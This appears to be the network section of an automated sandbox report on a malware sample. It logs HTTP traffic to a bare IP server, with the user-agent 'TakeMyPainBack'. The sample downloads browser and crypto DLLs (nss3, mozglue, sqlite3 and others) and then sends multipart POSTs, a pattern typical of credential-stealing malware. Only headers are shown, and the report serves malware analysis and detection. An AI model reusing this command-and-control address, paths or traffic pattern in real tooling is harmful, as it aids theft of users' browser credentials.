Network Analysis
| IP Address | Status | Action |
|---|---|---|
| 77.73.133.7 | Active | Moloch |
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| No hosts contacted. | ||
POST
200
http://77.73.133.7/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: TakeMyPainBack
Host: 77.73.133.7
Content-Length: 95
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 11 Oct 2022 00:44:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 6703
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
X-DNS-Prefetch-Control: off
Expect-CT: max-age=0
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
Origin-Agent-Cluster: ?1
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: no-referrer
X-XSS-Protection: 0
ETag: W/"1a2f-OMOJVCGnEcSQfG29XGNxBF1R4bw"
GET
200
http://77.73.133.7/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
REQUEST
RESPONSE
BODY
GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1
Content-Type: text/plain;
User-Agent: TakeMyPainBack
Host: 77.73.133.7
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 11 Oct 2022 00:44:52 GMT
Content-Type: application/octet-stream
Content-Length: 2042296
Connection: keep-alive
Last-Modified: Mon, 11 Apr 2022 14:39:48 GMT
ETag: "62543db4-1f29b8"
Accept-Ranges: bytes
GET
200
http://77.73.133.7/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll
REQUEST
RESPONSE
BODY
GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1
Content-Type: text/plain;
User-Agent: TakeMyPainBack
Host: 77.73.133.7
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 11 Oct 2022 00:44:55 GMT
Content-Type: application/octet-stream
Content-Length: 449280
Connection: keep-alive
Last-Modified: Mon, 11 Apr 2022 14:39:42 GMT
ETag: "62543dae-6db00"
Accept-Ranges: bytes
GET
200
http://77.73.133.7/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll
REQUEST
RESPONSE
BODY
GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1
Content-Type: text/plain;
User-Agent: TakeMyPainBack
Host: 77.73.133.7
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 11 Oct 2022 00:44:56 GMT
Content-Type: application/octet-stream
Content-Length: 80128
Connection: keep-alive
Last-Modified: Sat, 28 May 2022 16:52:46 GMT
ETag: "6292535e-13900"
Accept-Ranges: bytes
GET
200
http://77.73.133.7/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll
REQUEST
RESPONSE
BODY
GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1
Content-Type: text/plain;
User-Agent: TakeMyPainBack
Host: 77.73.133.7
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 11 Oct 2022 00:44:57 GMT
Content-Type: application/octet-stream
Content-Length: 627128
Connection: keep-alive
Last-Modified: Mon, 11 Apr 2022 14:39:36 GMT
ETag: "62543da8-991b8"
Accept-Ranges: bytes
GET
200
http://77.73.133.7/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll
REQUEST
RESPONSE
BODY
GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1
Content-Type: text/plain;
User-Agent: TakeMyPainBack
Host: 77.73.133.7
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 11 Oct 2022 00:44:58 GMT
Content-Type: application/octet-stream
Content-Length: 684984
Connection: keep-alive
Last-Modified: Mon, 11 Apr 2022 14:40:08 GMT
ETag: "62543dc8-a73b8"
Accept-Ranges: bytes
GET
200
http://77.73.133.7/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll
REQUEST
RESPONSE
BODY
GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1
Content-Type: text/plain;
User-Agent: TakeMyPainBack
Host: 77.73.133.7
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 11 Oct 2022 00:44:59 GMT
Content-Type: application/octet-stream
Content-Length: 254392
Connection: keep-alive
Last-Modified: Mon, 11 Apr 2022 14:39:58 GMT
ETag: "62543dbe-3e1b8"
Accept-Ranges: bytes
GET
200
http://77.73.133.7/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll
REQUEST
RESPONSE
BODY
GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1
Content-Type: text/plain;
User-Agent: TakeMyPainBack
Host: 77.73.133.7
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 11 Oct 2022 00:45:00 GMT
Content-Type: application/octet-stream
Content-Length: 1099223
Connection: keep-alive
Last-Modified: Mon, 11 Apr 2022 12:28:56 GMT
ETag: "62541f08-10c5d7"
Accept-Ranges: bytes
POST
200
http://77.73.133.7/d978126996ddb27849ad730eefea7bc8
REQUEST
RESPONSE
BODY
POST /d978126996ddb27849ad730eefea7bc8 HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=A9HFXiJsjvb4j8h6
User-Agent: TakeMyPainBack
Host: 77.73.133.7
Content-Length: 2810
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 11 Oct 2022 00:45:01 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: keep-alive
Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
X-DNS-Prefetch-Control: off
Expect-CT: max-age=0
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
Origin-Agent-Cluster: ?1
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: no-referrer
X-XSS-Protection: 0
ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw"
POST
200
http://77.73.133.7/d978126996ddb27849ad730eefea7bc8
REQUEST
RESPONSE
BODY
POST /d978126996ddb27849ad730eefea7bc8 HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=x8JIN00YeFtwGB54
User-Agent: TakeMyPainBack
Host: 77.73.133.7
Content-Length: 589
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 11 Oct 2022 00:45:01 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: keep-alive
Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
X-DNS-Prefetch-Control: off
Expect-CT: max-age=0
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
Origin-Agent-Cluster: ?1
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: no-referrer
X-XSS-Protection: 0
ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw"
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts